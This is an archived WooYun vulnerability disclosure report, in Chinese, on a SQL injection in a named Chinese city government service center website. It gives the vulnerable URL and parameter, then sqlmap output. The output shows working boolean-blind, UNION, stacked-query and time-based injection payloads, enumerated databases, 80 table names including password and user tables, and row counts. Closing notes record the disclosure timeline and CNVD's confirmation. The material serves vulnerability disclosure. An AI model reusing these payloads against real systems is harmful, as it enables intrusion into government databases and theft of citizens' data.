乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-07: 细节已通知厂商并且等待厂商处理中 2015-04-10: 厂商已经确认,细节仅向厂商公开 2015-04-20: 细节向核心白帽子及相关领域专家公开 2015-04-30: 细节向普通白帽子公开 2015-05-10: 细节向实习白帽子公开 2015-05-25: 细节向公众公开
某市人民政府政务服务中心存在get注入
问题存在于当阳市人民政府政务服务中心http://www.dyxz.gov.cn/application/wsbs/bszn/xzzhinanxiang.jsp?ZJJGDM=01115411X&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80 (GET)
用sqlmap跑多了就访问不了了
Payload: ZJJGDM=01115411X' WAITFOR DELAY '0:0:5'--&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80---web application technology: JSPback-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] master[*] model[*] msdb[*] tempdb[*] web_dangyangsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
back-end DBMS: Microsoft SQL Server 2005Database: web_dangyang[80 tables]+-----------------------------+| T_APPLICANT || T_BSGXB || T_BUSIITEM || T_BUSINESS || T_DCB || T_DEALSELDOCS || T_DJL || T_DOCCONFIG || T_FAQ || T_GROUPOFUSER || T_HFB || T_INFORMATION || T_JC_TS_GRSF || T_JC_TS_TSLX || T_JC_TS_TSWTFL || T_JC_TS_XB || T_JC_TS_XZXWLX || T_JC_TS_YESORNO || T_JC_XZXK_BANJIE || T_JC_XZXK_BUSIINDEX || T_JC_XZXK_BUSI_TIMELIMIT || T_JC_XZXK_PERMISSIONITEMSYS || T_JC_XZXK_SHOULI || T_LOG || T_LYB || T_MENU || T_OL_BUSIDEAL || T_OL_DIANZIWENDANG || T_OL_EDOCUMENT || T_OL_SHENQINGBIANHAO || T_OL_SHENQINGFANGZILIAO || T_OL_XIANSHIXINXIPEIZHI || T_OL_YEWUSHENQING || T_ONLINEUSER || T_POWER || T_POWEROFGROUP || T_POWEROFUSER || T_QYJMBSB_FL || T_QYJMBSB_SL || T_QYJMBSB_ZL || T_SATISFYANSWER || T_SATISFYSUBJECT || T_SB_USER || T_SELDOC || T_SPITEMOFBUSIITEM || T_SURVEY || T_SYSDUTY || T_SYS_DEPARTMENT || T_SYS_DUTY || T_TEMPLATE || T_TSDH || T_TSLX || T_TSSLB || T_TSTYPE || T_TSWTFL || T_TSXB || T_USER || T_USERGROUP || T_WEBUSER || T_WEBUSERINFO || T_XKWD || T_YSBUSI || T_ZILEI_SUNLEI_GUANXI || T_ZRXX || VIEW1 || dtproperties || sqlmapoutput || t_allforms || t_chats || t_department || t_document || t_duty || t_exception_info || t_forms || t_passwordofforms || t_permissionitem || t_permissionitem_bak || t_permissionitem_type || t_query || t_web_user |+-----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ZJJGDM (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ZJJGDM=01115411X' AND 6959=6959 AND 'zmyw'='zmyw&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: ZJJGDM=01115411X' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(88)+CHAR(112)+CHAR(79)+CHAR(82)+CHAR(88)+CHAR(67)+CHAR(98)+CHAR(69)+CHAR(68)+CHAR(74)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL,NULL-- &depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ZJJGDM=01115411X'; WAITFOR DELAY '0:0:5'--&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ZJJGDM=01115411X' WAITFOR DELAY '0:0:5'--&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80---web application technology: JSPback-end DBMS: Microsoft SQL Server 2005Database: web_dangyang[80 tables]+-----------------------------+| T_APPLICANT || T_BSGXB || T_BUSIITEM || T_BUSINESS || T_DCB || T_DEALSELDOCS || T_DJL || T_DOCCONFIG || T_FAQ || T_GROUPOFUSER || T_HFB || T_INFORMATION || T_JC_TS_GRSF || T_JC_TS_TSLX || T_JC_TS_TSWTFL || T_JC_TS_XB || T_JC_TS_XZXWLX || T_JC_TS_YESORNO || T_JC_XZXK_BANJIE || T_JC_XZXK_BUSIINDEX || T_JC_XZXK_BUSI_TIMELIMIT || T_JC_XZXK_PERMISSIONITEMSYS || T_JC_XZXK_SHOULI || T_LOG || T_LYB || T_MENU || T_OL_BUSIDEAL || T_OL_DIANZIWENDANG || T_OL_EDOCUMENT || T_OL_SHENQINGBIANHAO || T_OL_SHENQINGFANGZILIAO || T_OL_XIANSHIXINXIPEIZHI || T_OL_YEWUSHENQING || T_ONLINEUSER || T_POWER || T_POWEROFGROUP || T_POWEROFUSER || T_QYJMBSB_FL || T_QYJMBSB_SL || T_QYJMBSB_ZL || T_SATISFYANSWER || T_SATISFYSUBJECT || T_SB_USER || T_SELDOC || T_SPITEMOFBUSIITEM || T_SURVEY || T_SYSDUTY || T_SYS_DEPARTMENT || T_SYS_DUTY || T_TEMPLATE || T_TSDH || T_TSLX || T_TSSLB || T_TSTYPE || T_TSWTFL || T_TSXB || T_USER || T_USERGROUP || T_WEBUSER || T_WEBUSERINFO || T_XKWD || T_YSBUSI || T_ZILEI_SUNLEI_GUANXI || T_ZRXX || VIEW1 || dtproperties || sqlmapoutput || t_allforms || t_chats || t_department || t_document || t_duty || t_exception_info || t_forms || t_passwordofforms || t_permissionitem || t_permissionitem_bak || t_permissionitem_type || t_query || t_web_user |+-----------------------------+Database: web_dangyang+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| dbo.T_DJL | 541313 || dbo.T_OL_BUSIDEAL | 318758 || dbo.T_APPLICANT | 77404 || dbo.T_BUSINESS | 61142 || dbo.T_LOG | 18769 || dbo.T_ONLINEUSER | 3623 || dbo.T_OL_SHENQINGBIANHAO | 1590 || dbo.T_SPITEMOFBUSIITEM | 1514 || dbo.T_INFORMATION | 1410 || dbo.T_DOCCONFIG | 1329 || dbo.t_document | 1281 || dbo.T_POWEROFUSER | 1080 || dbo.t_web_user | 801 || dbo.T_LYB | 661 || dbo.t_passwordofforms | 574 || dbo.t_permissionitem | 439 || dbo.T_BUSIITEM | 430 || dbo.T_POWEROFGROUP | 375 || dbo.T_ZILEI_SUNLEI_GUANXI | 299 || dbo.T_HFB | 255 || dbo.T_OL_SHENQINGFANGZILIAO | 178 || dbo.T_OL_YEWUSHENQING | 178 || dbo.T_DEALSELDOCS | 142 || dbo.t_permissionitem_bak | 72 || dbo.T_ZRXX | 54 || dbo.T_QYJMBSB_ZL | 50 || dbo.T_SYS_DUTY | 47 || dbo.T_POWER | 46 || dbo.T_MENU | 45 || dbo.t_department | 40 || dbo.T_FAQ | 34 || dbo.T_SATISFYANSWER | 32 || dbo.t_forms | 31 || dbo.T_GROUPOFUSER | 22 || dbo.T_DCB | 20 || dbo.t_duty | 14 || dbo.T_TSDH | 14 || dbo.T_JC_TS_GRSF | 13 || dbo.T_JC_TS_TSWTFL | 13 || dbo.T_TSWTFL | 13 || dbo.T_OL_EDOCUMENT | 12 || dbo.t_permissionitem_type | 12 || dbo.T_XKWD | 10 || dbo.T_JC_TS_XZXWLX | 9 || dbo.t_allforms | 7 || dbo.T_TSSLB | 6 || dbo.T_USER | 6 || dbo.T_USERGROUP | 6 || dbo.T_TEMPLATE | 5 || dbo.T_SURVEY | 4 || dbo.T_SYSDUTY | 4 || dbo.T_JC_TS_TSLX | 3 || dbo.T_JC_TS_XB | 3 || dbo.T_TSLX | 3 || dbo.T_TSTYPE | 3 || dbo.T_TSXB | 3 || dbo.T_JC_TS_YESORNO | 2 || dbo.T_OL_DIANZIWENDANG | 2 || dbo.T_QYJMBSB_FL | 2 || dbo.T_SATISFYSUBJECT | 1 || dbo.T_WEBUSER | 1 |+-----------------------------+---------+
危害等级:高
漏洞Rank:11
确认时间:2015-04-10 17:38
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给湖北分中心,由湖北分中心后续协调网站管理单位处置。
暂无